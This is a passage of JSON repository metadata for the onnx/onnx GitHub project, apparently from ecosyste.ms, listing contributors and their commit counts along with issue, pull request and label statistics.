Neuendorffer","email":"stephen@neuendorffer.name","login":"stephenneuendorffer","count":1},{"name":"Sumit Kumar","email":"sumitk2303@gmail.com","login":"sumit2303","count":1},{"name":"Tabari Alexander","email":"tehbone","login":"tehbone","count":1},{"name":"Taketoshi Fujiwara","email":"taketoshi.fujiwara@gmail.com","login":"tfujiwar","count":1},{"name":"Takuya Wakisaka","email":"takuya.wakisaka@moldweorp.com","login":"ruimashita","count":1},{"name":"lewtun","email":"lewis.c.tunstall@gmail.com","login":"lewtun","count":1},{"name":"longlee0622","email":"linianlong@gmail.com","login":"longlee0622","count":1},{"name":"ma-hei","email":"marten_heidemeyer@web.de","login":"ma-hei","count":1},{"name":"mcollinswisc","email":"maxwell.collins@tetramem.com","login":"mcollinswisc","count":1},{"name":"mindest","email":"30493312+mindest","login":"mindest","count":1},{"name":"amarin16","email":"91211819+amarin16","login":"amarin16","count":1},{"name":"nickfeeney","email":"39503087+nickfeeney","login":"nickfeeney","count":1},{"name":"nishiji","email":"34439525+ryota717","login":"ryota717","count":1},{"name":"odidev","email":"odidev@puresoftware.com","login":"odidev","count":1},{"name":"peter yang","email":"peteryang@vip.qq.com","login":"peteryang1","count":1},{"name":"q-ycong-p","email":"50014064+q-ycong-p","login":"q-ycong-p","count":1},{"name":"rajalakshmi139","email":"rajarajalakshmi.k@gmail.com","login":"rajalakshmi139","count":1},{"name":"rockindy","email":"37647490+rockindy","login":"rockindy","count":1},{"name":"seungwoo-ji","email":"seungwoo.ji@nuvilab.com","login":"seungwoo-ji-03","count":1},{"name":"shjwudp","email":"shjwudp@gmail.com","login":"shjwudp","count":1},{"name":"sunflowersxu","email":"166728538+sunflowersxu","login":"sunflowersxu","count":1},{"name":"trinhgiahuy","email":"65078173+trinhgiahuy","login":"trinhgiahuy","count":1},{"name":"triple Mu","email":"gpu@163.com","login":"triple-Mu","count":1},{"name":"uint256_t","email":"maekawatoshiki1017@gmail.com","login":"maekawatoshiki","count":1},{"name":"vahvero","email":"30704280+vahvero","login":"vahvero","count":1},{"name":"vraspar","email":"vrajang@outlook.com","login":"vraspar","count":1},{"name":"wezuo","email":"49965641+wezuo","login":"wezuo","count":1},{"name":"williamberman","email":"wlbberman@gmail.com","login":"williamberman","count":1},{"name":"xykong58","email":"41181494+xykong58","login":"xykong58","count":1},{"name":"Zach","email":"zach.ryan@iress.com","login":"zdryan","count":1},{"name":"Zachary DeVito","email":"zdevito@gmail.com","login":"zdevito","count":1},{"name":"Zijun Yu","email":"zijun.yu.joey@gmail.com","login":"wine99","count":1},{"name":"Zoltán Böszörményi","email":"zboszor@gmail.com","login":"zboszor","count":1},{"name":"aadith-warrier","email":"69920978+aadith-warrier","login":"aadith-warrier","count":1},{"name":"alx256","email":"41289125+alx256","login":"alx256","count":1},{"name":"Wouter Deconinck","email":"wdconinc@gmail.com","login":"wdconinc","count":1},{"name":"andreh7","email":"andre.holzner@gmail.com","login":"andreh7","count":1},{"name":"aoguntayo","email":"aoguntay@redhat.com","login":"aoguntayo","count":1},{"name":"assafpr","email":"93249401+assafpr","login":"assafpr","count":1},{"name":"cainbit","email":"cainbit@gmail.com","login":"cainbit","count":1},{"name":"chenbohua3","email":"chen_bohua@hotmail.com","login":"chenbohua3","count":1},{"name":"ee7u","email":"97831720+ee7u","login":"ee7u","count":1},{"name":"girifb","email":"36246520+girifb","login":"girifb","count":1},{"name":"gongsu832","email":"gong_su@hotmail.com","login":"gongsu832","count":1},{"name":"hchandola","email":"6212113+hchandola","login":"hchandola","count":1},{"name":"impactaky","email":"37619203+impactaky","login":"impactaky","count":1},{"name":"ivberg","email":"ivberg@microsoft.com","login":"ivberg","count":1},{"name":"joohoon","email":"joohoon@gmail.com","login":"joohoon","count":1},{"name":"jslap-ubi","email":"151566283+jslap-ubi","login":"jslap-ubi","count":1},{"name":"jywumsft","email":"31933502+jywumsft","login":"jywumsft","count":1},{"name":"kavanabhat","email":"kavana.bhat@in.ibm.com","login":"kavanabhat","count":1},{"name":"kcvlex","email":"krkr9893@gmail.com","login":"kcvlex","count":1},{"name":"kolasaniv1996","email":"92003218+kolasaniv1996","login":"kolasaniv1996","count":1},{"name":"Chris Seymour","email":"chris.j.seymour@hotmail.com","login":"iiSeymour","count":1},{"name":"Clarke Rahrig","email":"crahrig@gmail.com","login":"crahrig","count":1},{"name":"Danial Javady","email":"122740063+ZelboK","login":"ZelboK","count":1},{"name":"Daniel J. H","email":"daniel+github@trvx.org","login":"daniel-j-h","count":1},{"name":"Daniel Richard G","email":"skunk@iSKUNK.ORG","login":"iskunk","count":1},{"name":"Debasish Biswas","email":"debasishbsws.dev@gmail.com","login":"debasishbsws","count":1},{"name":"Derek Murray","email":"derek.murray@gmail.com","login":"mrry","count":1},{"name":"Divyanshu Kumar","email":"53843818+divyanshugit","login":"divyanshugit","count":1},{"name":"Dominic Jodoin","email":"dominic@travis-ci.com","login":"cotsog","count":1},{"name":"EduMoreno","email":"eduardomoreno2594@gmail.com","login":"EduMorenoJ","count":1},{"name":"Elliot Waite","email":"elliot@elliotwaite.com","login":"elliotwaite","count":1},{"name":"Erik Cederstrand","email":"erik@cederstrand.dk","login":"ecederstrand","count":1},{"name":"Ettore Tiotto","email":"etiotto@gmail.com","login":"etiotto","count":1},{"name":"Eundoo Song","email":"eundoo.song@gmail.com","login":"eundoosong","count":1},{"name":"Fangjun Kuang","email":"csukuangfj@gmail.com","login":"csukuangfj","count":1},{"name":"Foundsheep","email":"92705171+Foundsheep","login":"Foundsheep","count":1},{"name":"Mehmet Can Farsak","email":"32980057+mehmetcanfarsak","login":"mehmetcanfarsak","count":1},{"name":"François Garillot","email":"francois@garillot.net","login":"huitseeker","count":1},{"name":"Gabriel Dennis","email":"gabrieldennis17@gmail.com","login":"gden173","count":1},{"name":"Gaétan Lepage","email":"33058747+GaetanLepage","login":"GaetanLepage","count":1},{"name":"Geoffrey Thomas","email":"geofft@ldpreload.com","login":"geofft","count":1},{"name":"Giulio Eulisse","email":"10544+ktf","login":"ktf","count":1},{"name":"Guo Yejun (郭叶军)","email":"yejun.guo@intel.com","login":"guoyejun","count":1},{"name":"Gustavo Alvarez","email":"462213+sl1pkn07","login":"sl1pkn07","count":1},{"name":"Chris Hua","email":"chua@squareup.com","login":null,"count":1},{"name":"AlexMuresan","email":"alex.muresan07@gmail.com","login":"AlexMuresan","count":1},{"name":"Alex Gresnel","email":"31708810+agresnel","login":"agresnel","count":1},{"name":"Alex Garustovich","email":"yukigaru@gmail.com","login":"Yukigaru","count":1},{"name":"Aishwarya Badlani","email":"41635755+Aishwarya0811","login":"Aishwarya0811","count":1},{"name":"Aiken Cairncross","email":"acairncross@gmail.com","login":"acairncross","count":1},{"name":"Abhishek-TyRnT","email":"58800592+Abhishek-TyRnT","login":"Abhishek-TyRnT","count":1},{"name":"Calvin McCarter","email":"77687912+calvinmccarter-at-lightmatter","login":"calvinmccarter-at-lightmatter","count":1},{"name":"Bryan Anderson","email":"andembry@amazon.com","login":"andembry","count":1},{"name":"Brian Martin","email":"42186431+martinb35","login":"martinb35","count":1},{"name":"Bram","email":"b.dewit@applyai.nl","login":"Swopper050","count":1},{"name":"Bilyana Indzheva","email":"36890669+bili2002","login":"bili2002","count":1},{"name":"Beomsoo Kim","email":"bluewhale8202@gmail.com","login":"bombs-kim","count":1},{"name":"Ben Avrahami","email":"avrahami.ben@gmail.com","login":"bentheiii","count":1},{"name":"Ben","email":"bstriner","login":"bstriner","count":1},{"name":"Bashintosh","email":"contact@lucasmahieu.fr","login":"LucasMahieu","count":1},{"name":"Baidar","email":"karimbaidar@yahoo.com","login":"karimbaidar","count":1},{"name":"Autumn Nash","email":"34965675+WithEnoughCoffee","login":"WithEnoughCoffee","count":1},{"name":"Arthur Meyre","email":"arthur.meyre@zama.ai","login":"IceTDrinker","count":1},{"name":"Anubhav Kumar","email":"anubhav22.kumar@gmail.com","login":"kaiserliche","count":1},{"name":"462630221","email":"35516720+462630221","login":"462630221","count":1},{"name":"Chanjung Kim","email":"freiyer.paxbun@gmail.com","login":"paxbun","count":1},{"name":"Chen Chongsong","email":"chongsong.chen@bytedance.com","login":"chenchongsong","count":1},{"name":"Chris Hua","email":"hua.christopher@gmail.com","login":"stillmatic","count":1},{"name":"Lei Mao","email":"dukeleimao@gmail.com","login":"leimao","count":1},{"name":"LeicongLi","email":"leicongli@gmail.com","login":"LeicongLi","count":1},{"name":"Leso_KN","email":"info@lesosoftware.com","login":"leso-kn","count":1},{"name":"LexXia","email":"42466682+LexXia","login":"LexXia","count":1},{"name":"Liu Jinjie","email":"68475640+sgjzfzzf","login":"sgjzfzzf","count":1},{"name":"LiuYu198701","email":"56528180+LiuYu198701","login":"LiuYu198701","count":1},{"name":"Liuyu198701","email":"56528180+Liuyu198701","login":"Liuyu198701","count":1},{"name":"Maher Jendoubi","email":"maher.jendoubi@gmail.com","login":"MaherJendoubi","count":1},{"name":"Maik Riechert","email":"maik.riechert@arcor.de","login":"letmaik","count":1},{"name":"Mark Harfouche","email":"mark.harfouche@gmail.com","login":"hmaarrfk","count":1},{"name":"Markus Bilz","email":"github@markusbilz.com","login":"KarelZe","count":1},{"name":"Masahiro Hiramori","email":"contact@mshr-h.com","login":"mshr-h","count":1},{"name":"Jerry","email":"bignose1007@gmail.com","login":"JerryShih","count":1},{"name":"Meilof Veeningen","email":"82084087+meilofveeningen-rl","login":"meilofveeningen-rl","count":1},{"name":"Miguel de Icaza","email":"miguel@gnome.org","login":"migueldeicaza","count":1},{"name":"Nathan Goldbaum","email":"nathan.goldbaum@gmail.com","login":"ngoldbaum","count":1},{"name":"Nenad Banfic","email":"46795300+nenad1002","login":"nenad1002","count":1},{"name":"NguyenCong2k","email":"123174148+NguyenCong2k","login":"NguyenCong2k","count":1},{"name":"Nikita Shulga","email":"nikita.shulga@gmail.com","login":"malfet","count":1},{"name":"Orion Reblitz-Richardson","email":"orionr@gmail.com","login":"orionr","count":1},{"name":"Paul Jesse Hellemn","email":"jesse.hellemn@gmail.com","login":"pjh5","count":1},{"name":"Paul McDaniel","email":"paul_mcdaniel@hotmail.com","login":"walrusmcd","count":1},{"name":"Pawel Raasz","email":"pawel.raasz@intel.com","login":"praasz","count":1},{"name":"Peishen Yan","email":"peishen.yan@intel.com","login":"peishenyan","count":1},{"name":"H1Gdev","email":"h1g.z.ouroboros+github@gmail.com","login":"H1Gdev","count":1},{"name":"HE, Tao","email":"sighingnow@gmail.com","login":"sighingnow","count":1},{"name":"Hagay Lupesko","email":"lupesko","login":"lupesko","count":1},{"name":"Haibo Hao","email":"haohaibo031113@163.com","login":"haohaibo","count":1},{"name":"Haruki Imai","email":"imaihal@jp.ibm.com","login":"imaihal","count":1},{"name":"Henry Schreiner","email":"HenrySchreinerIII@gmail.com","login":"henryiii","count":1},{"name":"Hong Xu","email":"hong@topbug.net","login":"xuhdev","count":1},{"name":"Howard","email":"62500402+How-Wang","login":"How-Wang","count":1},{"name":"Ikko Eltociear Ashimine","email":"eltociear@gmail.com","login":"eltociear","count":1},{"name":"Ishan Singh","email":"86545965+Ishan-cmd","login":"Ishan-cmd","count":1},{"name":"Ivan Novikov","email":"johnnovikov0@gmail.com","login":"jnovikov","count":1},{"name":"Jack·Boos·Yu","email":"47264268+JackBoosY","login":"JackBoosY","count":1},{"name":"Jagadeesh V","email":"jagadeesh.vijayendran@multicorewareinc.com","login":"jagadeeshvx","count":1},{"name":"Jakub Bachurski","email":"KubinGH","login":"KubinGH","count":1},{"name":"James Gerity","email":"snoop.jedi@gmail.com","login":"SnoopJ","count":1},{"name":"Jason Plurad","email":"pluradj@us.ibm.com","login":"pluradj","count":1},{"name":"Jean Senellart","email":"jean@senellart.com","login":"jsenellart","count":1},{"name":"Frank","email":"97429702+tsubasakong","login":"tsubasakong","count":1},{"name":"Jessica Marz","email":"1458538+jkmarz","login":"jkmarz","count":1},{"name":"Jicheng Tang","email":"tangjch15@gmail.com","login":"tangjicheng1","count":1},{"name":"Joshua Lochner","email":"admin@xenova.com","login":"xenova","count":1},{"name":"Justin Stoecker","email":"justin.w.stoecker@gmail.com","login":"jstoecker","count":1},{"name":"Krishna Chaitanya","email":"krishnabkc15@gmail.com","login":"Krishnachaitanyakc","count":1},{"name":"Kryptonite","email":"oalazizi75@gmail.com","login":"OmarAzizi","count":1},{"name":"yanbc","email":"imyanbc@gmail.com","login":"YanBC","count":1}],"past_year_committers":[{"name":"Andreas Fehlner","email":"fehlner@arcor.de","login":"andife","count":170},{"name":"dependabot[bot]","email":"49699333+dependabot[bot]","login":"dependabot[bot]","count":118},{"name":"Yuanyuan Chen","email":"cyyever@outlook.com","login":"cyyever","count":79},{"name":"Christian Bourjau","email":"cbourjau","login":"cbourjau","count":35},{"name":"Justin Chu","email":"justinchuby","login":"justinchuby","count":29},{"name":"Ti-Tai Wang","email":"titaiwang@microsoft.com","login":"titaiwangms","count":26},{"name":"Copilot","email":"198982749+Copilot","login":"Copilot","count":21},{"name":"Yuan Yao","email":"99693700+yuanyao-nv","login":"yuanyao-nv","count":10},{"name":"Xavier Dupré","email":"xadupre","login":"xadupre","count":9},{"name":"renovate[bot]","email":"29139614+renovate[bot]","login":"renovate[bot]","count":9},{"name":"G. Ramalingam","email":"grama@microsoft.com","login":"gramalingam","count":8},{"name":"konstantin-pueckler-qc","email":"konstantin.pueckler@quantco.com","login":"konstantin-pueckler-qc","count":7},{"name":"Sunny Anand","email":"164108690+Sunny-Anand","login":"Sunny-Anand","count":5},{"name":"TR-3B","email":"144127816+MagellaX","login":"MagellaX","count":5},{"name":"Takeshi Watanabe","email":"take-cheeze","login":"take-cheeze","count":4},{"name":"Robert Knight","email":"robertknight@gmail.com","login":"robertknight","count":3},{"name":"Brennan Ravenscroft","email":"Bward7864@gmail.com","login":"Shadows-of-Fire","count":3},{"name":"Chessing234","email":"134995372+Chessing234","login":"Chessing234","count":2},{"name":"Joshua Rothe","email":"joshrothe@gmail.com","login":"rothej","count":2},{"name":"Pratishtha Singh","email":"182654574+Pratishtha5","login":"Pratishtha5","count":2},{"name":"Stefan Liebler","email":"stli@linux.ibm.com","login":"stliibm","count":2},{"name":"Tommaso Adani","email":"83273681+tadani3","login":"tadani3","count":2},{"name":"Lee Yongjun","email":"35302114+elwhyjay","login":"elwhyjay","count":2},{"name":"Zachary Woods","email":"143150513+mrgyatso","login":"mrgyatso","count":2},{"name":"Aishwarya Badlani","email":"41635755+Aishwarya0811","login":"Aishwarya0811","count":1},{"name":"Alexander Kvitkevich","email":"100673758+alexkvitkevich","login":"alexkvitkevich","count":1},{"name":"Autumn Nash","email":"34965675+WithEnoughCoffee","login":"WithEnoughCoffee","count":1},{"name":"Baidar","email":"karimbaidar@yahoo.com","login":"karimbaidar","count":1},{"name":"Ben Avrahami","email":"avrahami.ben@gmail.com","login":"bentheiii","count":1},{"name":"Danni","email":"leedanni@gmail.com","login":"isdanni","count":1},{"name":"vraspar","email":"vrajang@outlook.com","login":"vraspar","count":1},{"name":"nishiji","email":"34439525+ryota717","login":"ryota717","count":1},{"name":"kcvlex","email":"krkr9893@gmail.com","login":"kcvlex","count":1},{"name":"ee7u","email":"97831720+ee7u","login":"ee7u","count":1},{"name":"assafpr","email":"93249401+assafpr","login":"assafpr","count":1},{"name":"aoguntayo","email":"aoguntay@redhat.com","login":"aoguntayo","count":1},{"name":"amarin16","email":"91211819+amarin16","login":"amarin16","count":1},{"name":"alx256","email":"41289125+alx256","login":"alx256","count":1},{"name":"Zoltán Böszörményi","email":"zboszor@gmail.com","login":"zboszor","count":1},{"name":"Zach","email":"zach.ryan@iress.com","login":"zdryan","count":1},{"name":"Vedant Madane","email":"6527493+VedantMadane","login":"VedantMadane","count":1},{"name":"Trevor Gamblin","email":"tgamblin@ecocode.ca","login":"threexc","count":1},{"name":"Sumit Kumar","email":"sumitk2303@gmail.com","login":"sumit2303","count":1},{"name":"Simon Byrne","email":"simonbyrne@gmail.com","login":"simonbyrne","count":1},{"name":"Scott McKay","email":"skottmckay@gmail.com","login":"skottmckay","count":1},{"name":"RAGHUL M","email":"ragm@redhat.com","login":"Raghul-M","count":1},{"name":"NguyenCong2k","email":"123174148+NguyenCong2k","login":"NguyenCong2k","count":1},{"name":"Meilof Veeningen","email":"82084087+meilofveeningen-rl","login":"meilofveeningen-rl","count":1},{"name":"Matteo Salvarezza","email":"matteo.salvarezza@gmail.com","login":"matteosal","count":1},{"name":"Masahiro Hiramori","email":"contact@mshr-h.com","login":"mshr-h","count":1},{"name":"Markus Bilz","email":"github@markusbilz.com","login":"KarelZe","count":1},{"name":"Mark Harfouche","email":"mark.harfouche@gmail.com","login":"hmaarrfk","count":1},{"name":"Kryptonite","email":"oalazizi75@gmail.com","login":"OmarAzizi","count":1},{"name":"Krishna Chaitanya","email":"krishnabkc15@gmail.com","login":"Krishnachaitanyakc","count":1},{"name":"Jagadeesh V","email":"jagadeesh.vijayendran@multicorewareinc.com","login":"jagadeeshvx","count":1},{"name":"Frank","email":"97429702+tsubasakong","login":"tsubasakong","count":1},{"name":"Erik Cederstrand","email":"erik@cederstrand.dk","login":"ecederstrand","count":1},{"name":"Edward Chen","email":"18449977+edgchen1","login":"edgchen1","count":1},{"name":"Dmitri Smirnov","email":"yuslepukhin","login":"yuslepukhin","count":1},{"name":"Debasish Biswas","email":"debasishbsws.dev@gmail.com","login":"debasishbsws","count":1}],"commits_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/commits","host":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2026-06-05T00:00:10.712Z","repositories_count":6253761,"commits_count":883875400,"contributors_count":35040679,"owners_count":1162861,"icon_url":"https://github.com/github.png","host_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories"}},"issues":{"table":{"full_name":"onnx/onnx","html_url":"https://github.com/onnx/onnx","last_synced_at":"2025-10-29T12:00:44.822Z","status":null,"issues_count":1002,"pull_requests_count":2088,"avg_time_to_close_issue":24651025.396024466,"avg_time_to_close_pull_request":3750894.192264574,"issues_closed_count":653,"pull_requests_closed_count":1784,"pull_request_authors_count":174,"issue_authors_count":605,"avg_comments_per_issue":2.6766467065868262,"avg_comments_per_pull_request":1.985632183908046,"merged_pull_requests_count":1448,"bot_issues_count":5,"bot_pull_requests_count":386,"past_year_issues_count":199,"past_year_pull_requests_count":1009,"past_year_avg_time_to_close_issue":1559781.7435897435,"past_year_avg_time_to_close_pull_request":374142.2801992528,"past_year_issues_closed_count":78,"past_year_pull_requests_closed_count":803,"past_year_pull_request_authors_count":67,"past_year_issue_authors_count":119,"past_year_avg_comments_per_issue":1.5628140703517588,"past_year_avg_comments_per_pull_request":1.6590683845391476,"past_year_bot_issues_count":5,"past_year_bot_pull_requests_count":186,"past_year_merged_pull_requests_count":696,"created_at":"2023-05-10T11:07:03.239Z","updated_at":"2025-10-29T12:00:44.823Z","repository_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx","issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/issues","issue_labels_count":{"table":{"question":319,"bug":293,"stale":258,"contributions welcome":106,"enhancement":88,"operator":51,"no-issue-activity":50,"topic: operator":40,"topic: enhancement":37,"topic: spec clarification":36,"converters":33,"build":31,"good first issue":26,"shape inference":24,"runtime":18,"spec clarification":16,"tracking":15,"topic: documentation":15,"documentation":14,"module: shape inference":13,"topic: build":13,"spec":9,"onnx checker":8,"version converter":7,"utility":7,"module: spec":6,"CI pipelines":6,"dependencies":6,"topic: runtime":5,"module: version converter":5,"build pipelines":5,"reference implementation":5,"module: reference implementation":4,"topic: converters":4,"module: utility":4,"[bot] pixi CI":3,"run release CIs":3,"ir":3,"rfc":3,"module: checker":3,"topic: test":3,"announce":3,"test":3,"better engineering":3,"website content":3,"python":2,"discussion":2,"topic: better engineering":2,"module: CI pipelines":2,"onnx parser":2,"no-stale":1,"inliner":1,"code style":1,"github_actions":1,"partial data propagation":1,"protobuf":1,"module: schema":1,"optimizer":1,"topic: quantization":1,"module: parser":1,"module: inliner":1,"module: optimizer":1,"training":1,"low priority":1,"vulnerability":1,"announcement":1,"topic: partial data propagation":1}},"pull_request_labels_count":{"table":{"run release CIs":707,"dependencies":258,"github_actions":236,"python":151,"operator":51,"release notes":38,"better engineering":37,"auto update doc":37,"review needed: operators approvers":35,"topic: build":35,"stale":30,"topic: operator":23,"module: spec":22,"build":22,"shape inference":21,"documentation":20,"do not merge":17,"no-pr-activity":17,"build pipelines":17,"topic: better engineering":16,"module: reference implementation":14,"topic: spec clarification":13,"spec clarification":13,"module: utility":12,"test":12,"topic: bug fix":11,"module: CI pipelines":11,"topic: documentation":10,"topic: bc breaking":10,"reference implementation":10,"version converter":9,"topic: test":9,"website content":8,"utility":8,"code style":8,"onnx parser":8,"test ONNX Model Zoo":6,"onnx checker":6,"module: checker":4,"spec":4,"module: shape inference":4,"schema":3,"more info needed":3,"contributions welcome":2,"good first issue":2,"protobuf":2,"module: ir (c++)":2,"no-stale":2,"topic: deprecation":2,"partial data propagation":2,"inliner":2,"topic: enhancement":2,"enhancement":1,"module: dependencies":1,"module: version converter":1,"announce":1,"topic: better error message":1,"quantization":1,"module: inliner":1,"ir":1,"module: parser":1,"module: schema":1}},"issue_author_associations_count":{"table":{"NONE":637,"CONTRIBUTOR":266,"MEMBER":93,"COLLABORATOR":6}},"pull_request_author_associations_count":{"table":{"CONTRIBUTOR":1471,"MEMBER":473,"NONE":123,"COLLABORATOR":21}},"issue_authors":{"table":{"justinchuby":141,"andife":45,"jcwchen":17,"gramalingam":14,"liqunfu":13,"mgehre-amd":8,"AlexandreEichenberger":7,"cbourjau":7,"lucasjinreal":7,"galagam":7,"adityagoel4512":7,"robertknight":6,"xadupre":6,"cjvolzka":6,"yuslepukhin":6,"yuanyao-nv":6,"xiaowuhu":5,"kumar-utkarsh0317":5,"BowenBao":4,"yurivict":4,"kumarutkarsh1248":4,"ArchRobison":4,"abhishek27m1992github":4,"titaiwangms":4,"garymm":3,"Ksrkmdl0226":3,"leimao":3,"zhenhuaw-me":3,"Jason-Young-AI":3,"github-actions[bot]":3,"Aman-Surkar":3,"mathisdon":3,"TinaAMD":3,"fdwr":3,"snnn":3,"ivberg":3,"tonypottera24":3,"IzanCatalan":3,"CZXIANGOvO":3,"dependabot[bot]":2,"tehbone":2,"cqray1990":2,"thiagocrepaldi":2,"gineshidalgo99":2,"seawater668":2,"BwL1289":2,"cyyever":2,"jornfranke":2,"frankvp11":2,"dannyfriar":2,"ghost":2,"ArtyZe":2,"adrianlizarraga":2,"RunnerZhong":2,"mathmax12":2,"kraza8":2,"inisis":2,"Ashish0091":2,"duanshengliu":2,"LoSealL":2,"roachsinai":2,"MatejUrbanQC":2,"Lenan22":2,"Swopper050":2,"vera121":2,"stswidwinski":2,"harshakhmk":2,"zzqiuzz":2,"carrieyummy":2,"hmy-meng":2,"hariharans29":2,"vadimkantorov":2,"jikechao":2,"houseroad":2,"Marie-LineIbrahim":2,"DSP3460":2,"letmaik":2,"FrancescoSaverioZuppichini":2,"matteosal":2,"Abhishek-TyRnT":2,"Abdurrahheem":2,"dashesy":2,"broune":2,"josephrocca":2,"jbachurski":2,"mengniwang95":2,"jonas-doevenspeck":2,"Jack-liu1998":2,"yashgadodia12":2,"pnpuranik":2,"cho-m":2,"jeyblu":2,"Tunaaaaa":2,"asyms":1,"jvesely":1,"bhshp":1,"zhangxiang1993":1,"fengyuentau":1,"polarathene":1,"tgolsson":1,"atmadeep":1,"alexhallam":1,"Mathew5000":1,"vladlen32230":1,"al-rigazzi":1,"sl1pkn07":1,"negiyas":1,"sj120698":1,"lantudou":1,"jvivo":1,"Lewington-pitsos":1,"wangzhenlin123":1,"GoHard2023":1,"qiangxinixn":1,"pengwa":1,"duduscript":1,"momo1986":1,"jh97321":1,"JinyuJia-bot":1,"qidihan":1,"geofforigin8":1,"ragesh2000":1,"aksenventwo":1,"itssimon":1,"eKevinHoang":1,"yzhou0919":1,"clark-2000":1,"josel-amd":1,"TomWildenhain-Microsoft":1,"chrisbbayley":1,"qd986692950":1,"axinging":1,"HeliWang":1,"rgesteve":1,"rryan":1,"Ai-ZL":1,"w1005444804":1,"magicse":1,"jantonguirao":1,"imohammadhossein":1,"hernanmd":1,"ffxxjj":1,"wangzh63":1,"chayliu1991":1,"konstantin-pueckler-qc":1,"LHSSHL001":1,"aniruddhachoudhury":1,"chaodreaming":1,"Willikin":1,"YumainOB":1,"peishenyan":1,"kit1980":1,"AkshatDogra":1,"profPlum":1,"wllwel":1,"KarelZe":1,"JeanLoupFarges":1,"max-509":1,"jiangjiajun":1,"xiaoFine":1,"HasnaBoumiza":1,"xingjunhong":1,"mcollinswisc":1,"petewarden":1,"tarekgh":1,"nhkhiemSWE":1,"WillPen":1,"abedbaltaji":1,"crazyboy9103":1,"tzhang-666":1,"cyanic-selkie":1,"lofoner":1,"wwdok":1,"weixsong":1,"jlucaso1":1,"linshokaku":1,"BjGoCraft":1,"jorickert":1,"zw-xxx":1,"XiaBing992":1,"jambayk":1,"OswaldoBornemann":1,"monkeycc":1,"EzioQR":1,"v-ngangarapu":1,"wm2012011492":1,"lutzroeder":1,"onlyucanconquertime":1,"loblik":1,"ThomasLesp":1,"guranu":1,"alskdjfasdfsadf":1,"joda01":1,"deng-ShiFu":1,"BEEugene":1,"matscalia":1,"cena001plus":1,"zhoumenghan":1,"harshil1973":1,"mwangistan":1,"Guriido":1,"visin109":1,"HenokB":1,"manky006":1,"mkompanek":1,"zhipenghan":1,"MichaelH717":1,"guotuofeng":1,"victorsoda":1,"Dodonicc":1,"hasicx":1,"SrikaraPranesh":1,"sanbuphy":1,"RabJon":1,"danilyef":1,"tomshalini":1,"IngmarVoigt2":1,"xiaoche-24":1,"henbucuoshanghai":1,"SubGlitch1":1,"jonassoebro":1,"jnnks":1,"bakas-george":1,"RuchitaTekade":1,"hch-baobei":1,"MosbehBarhoumi":1,"6894556":1,"darkopetrovic":1,"acb146":1,"TheKingDuck":1,"fabecode":1,"lanhongvp":1,"keerthi2kiran":1,"SolomidHero":1,"lmariscal":1,"alex-aparin":1,"theflyingzamboni":1,"ice-tong":1,"hy846130226":1,"maxwillzq":1,"tle4336":1,"morgan-bc":1,"elenabettella":1,"SebastianJanampa":1,"yf711":1,"wrz1999":1,"p3achyjr":1,"ElinLiu0":1,"dgx11678832":1,"TechScribe-Deaf":1,"divideconcept":1,"Wuqiman":1,"czr-gc":1,"xuzijian629":1,"divinit7":1,"benmkw":1,"apuapu347":1,"Salary-only-17k":1,"shaoyuyoung":1,"hrieke":1,"gadregayatri":1,"BuxianChen":1,"jhelsas":1,"linkerzhang":1,"SzaremehrjardiMT":1,"wcycqjy":1,"guoyuhong":1,"miaowahexiaohuolong":1,"skewballfox":1,"ArmenAg":1,"stellaraccident":1,"modanesh":1,"mvanzulli":1,"NarenR21":1,"yyfcc17":1,"JonathanSum":1,"Stanley5249":1,"feliuf":1,"zhijxu-MS":1,"StefanZt":1,"hamptonm1":1,"p-wysocki":1,"kranthineo92":1,"chengven027-intellif":1,"newling":1,"oneengineer":1,"ZelboK":1,"kabyanil":1,"arefekh":1,"joshuacwnewton":1,"daveliddell":1,"mbencer":1,"skottmckay":1,"henry861114":1,"captainIT":1,"MOLOjl":1,"samuela":1,"ganler":1,"KoalaQin":1,"netaz":1,"german-cantu":1,"michaelroyzen":1,"monal0722":1,"Apisteftos":1,"Zahlii":1,"elephantpanda":1,"saurabh-shandilya":1,"YaroslavS1":1,"jolio007":1,"jacques0266":1,"zuixiaosanlang":1,"YI-MAX-YAN":1,"Godricly":1,"TimotheeWrightFicha":1,"rushi-the-neural-arch":1,"RyanShun-511":1,"claverru":1,"25b3nk":1,"O-3llc":1,"tcherckez-nvidia":1,"JianyyuWang":1,"liuy061530":1,"jmren168":1,"Mexyy":1,"micahstairs":1,"willmostly":1,"plabus":1,"yaoyuannnn":1,"jedbrown":1,"AyoubMDL":1,"FedyuninV":1,"grazder":1,"kgeorge-fission":1,"xkszltl":1,"Usernamezhx":1,"jiafatom":1,"Masquito":1,"OYCN":1,"techaitr":1,"IonBoleac":1,"aparpara":1,"amd-vivekag":1,"naor2013":1,"lg8080":1,"take-cheeze":1,"ironcg20":1,"hatchuta-xilinx":1,"siddharth062022":1,"Santhosh1509":1,"miayu79":1,"guoyujiang":1,"rachelglenn":1,"QZZZZZYF":1,"MaxeeCR":1,"mtngld":1,"vijayaramaraju-kalidindi":1,"pax-k":1,"SamNour":1,"wk19941015":1,"zz64":1,"chentong319":1,"Liuhehe2019":1,"kkloberdanz":1,"minhhotboy9x":1,"PliniLeonardo":1,"vraintanakarei":1,"jagadeeshvx":1,"mhmd97z":1,"scuizhibin":1,"surya00060":1,"wangjia184":1,"sveta-levitan":1,"coffezhou":1,"lsp2":1,"lehoangHUST":1,"happysalada":1,"daixiangzi":1,"salanzewei":1,"leatral":1,"younghuvee":1,"spgoswami1":1,"fuzzyBatman":1,"xiguadong":1,"prasanthpul":1,"wonderzy":1,"HAfpq":1,"sallamander317":1,"andletenkov":1,"Koris95":1,"xaviliz":1,"ge28boj":1,"MicroYu-jt":1,"wadhwasahil":1,"pranav-prakash":1,"sarmientoj24":1,"philass":1,"SmallBlackEgg":1,"williamlzw":1,"codyuan":1,"Craigacp":1,"parkkyungjun":1,"antimora":1,"michalkrawczyk":1,"leso-kn":1,"nathanjacobiOXOS":1,"igo312":1,"BGigotSDS":1,"pk-g":1,"DRKV333":1,"KuaiQuXueX1":1,"Andreas-Krebbel":1,"OKUA1":1,"haowang5128":1,"FHSatis":1,"IAMAl":1,"star-hengxing":1,"RAQUELPRIV